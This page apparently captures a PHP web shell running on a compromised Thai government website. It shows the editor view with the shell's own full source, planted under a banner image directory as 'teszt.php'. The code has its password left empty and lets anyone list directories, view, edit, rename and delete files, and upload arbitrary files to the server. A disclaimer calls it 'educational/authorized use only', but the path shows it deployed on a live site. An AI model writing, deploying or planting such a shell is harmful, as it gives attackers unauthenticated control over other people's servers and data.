Web Shell
Current directory: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner
Editing: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner/teszt.php
<?php // Simple PHP Web Shell with UI // For educational/authorized use only // Opsional: set password untuk autentikasi (kosongkan jika tidak perlu) $auth_password = ''; // Ganti dengan password jika ingin if ($auth_password !== '' && (!isset($_POST['auth_pass']) || $_POST['auth_pass'] !== $auth_password)) { if (isset($_POST['auth_pass'])) { echo 'Wrong password.'; } ?> <form method="post"> <input type="password" name="auth_pass" placeholder="Password" /> <input type="submit" value="Login" /> </form> <?php exit; } // Direktori saat ini $base_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); $base_dir = realpath($base_dir); if (!$base_dir || !is_dir($base_dir)) { $base_dir = getcwd(); } chdir($base_dir); // Handle aksi $action = isset($_GET['action']) ? $_GET['action'] : ''; $file = isset($_GET['file']) ? $_GET['file'] : ''; $new_name = isset($_POST['new_name']) ? $_POST['new_name'] : ''; if ($action == 'delete' && $file) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { unlink($path); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot delete: invalid file."; } } elseif ($action == 'rename' && $file && $new_name) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { $new_path = dirname($path) . '/' . $new_name; rename($path, $new_path); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot rename: invalid file."; } } elseif ($action == 'edit' && $file && isset($_POST['content'])) { $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)) { file_put_contents($path, $_POST['content']); header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Cannot edit: invalid file."; } } elseif ($action == 'upload' && isset($_FILES['upload_file'])) { $target = $base_dir . '/' . basename($_FILES['upload_file']['name']); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { header("Location: ?dir=" . urlencode($base_dir)); exit; } else { $error = "Upload failed."; } } // Tampilan UI ?> <!DOCTYPE html> <html> <head> <title>Web Shell</title> <style> body { font-family: monospace; margin: 20px; background: #f4f4f4; } .container { max-width: 1200px; margin: auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } h1 { margin-top: 0; } .path { background: #eee; padding: 10px; border-radius: 4px; margin-bottom: 20px; word-break: break-all; } table { width: 100%; border-collapse: collapse; } th, td { text-align: left; padding: 8px; border-bottom: 1px solid #ddd; } th { background: #f2f2f2; } .actions a { margin-right: 5px; text-decoration: none; } .upload-form { margin: 20px 0; padding: 10px; background: #f9f9f9; border: 1px solid #ddd; border-radius: 4px; } .upload-form input[type=file] { margin-right: 10px; } .error { color: red; margin-bottom: 10px; } .success { color: green; margin-bottom: 10px; } .edit-form textarea { width: 100%; height: 400px; font-family: monospace; margin-bottom: 10px; } .edit-form input[type=submit] { padding: 8px 16px; } </style> </head> <body> <div class="container"> <h1>Web Shell</h1> <?php if (isset($error)): ?> <div class="error"><?php echo htmlspecialchars($error); ?></div> <?php endif; ?> <div class="path">Current directory: <?php echo htmlspecialchars($base_dir); ?></div> <?php if ($action == 'edit' && $file): $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)): $content = file_get_contents($path); ?> <div class="edit-form"> <h2>Editing: <?php echo htmlspecialchars($file); ?></h2> <form method="post"> <textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br> <input type="submit" value="Save"> <a href="?dir=<?php echo urlencode($base_dir); ?>">Cancel</a> </form> </div> <?php else: ?> <div class="error">File not found or invalid.</div> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php endif; ?> <?php elseif ($action == 'view' && $file): $path = realpath($file); if ($path && strpos($path, $base_dir) === 0 && is_file($path)): ?> <h2>Viewing: <?php echo htmlspecialchars($file); ?></h2> <pre><?php echo htmlspecialchars(file_get_contents($path)); ?></pre> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php else: ?> <div class="error">File not found or invalid.</div> <a href="?dir=<?php echo urlencode($base_dir); ?>">Back</a> <?php endif; ?> <?php else: ?> <div class="upload-form"> <form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?php echo urlencode($base_dir); ?>"> <input type="file" name="upload_file"> <input type="submit" value="Upload"> </form> </div> <table> <thead> <tr><th>Name</th><th>Size</th><th>Actions</th></tr> </thead> <tbody> <?php $files = scandir($base_dir); foreach ($files as $item): if ($item == '.' || $item == '..') continue; $full_path = $base_dir . '/' . $item; $is_dir = is_dir($full_path); $size = $is_dir ? '-' : filesize($full_path); $link = $is_dir ? '?dir=' . urlencode($full_path) : '?action=view&file=' . urlencode($full_path) . '&dir=' . urlencode($base_dir); ?> <tr> <td><a href="<?php echo $link; ?>"><?php echo htmlspecialchars($item); ?></a></td> <td><?php echo $size; ?></td> <td class="actions"> <?php if (!$is_dir): ?> <a href="?action=edit&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>">Edit</a> <a href="?action=delete&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>" onclick="return confirm('Delete this file?')">Delete</a> <form style="display:inline;" method="post" action="?action=rename&file=<?php echo urlencode($full_path); ?>&dir=<?php echo urlencode($base_dir); ?>"> <input type="text" name="new_name" placeholder="New name" style="width:100px;"> <input type="submit" value="Rename"> </form> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> </div> </body> </html>
Cancel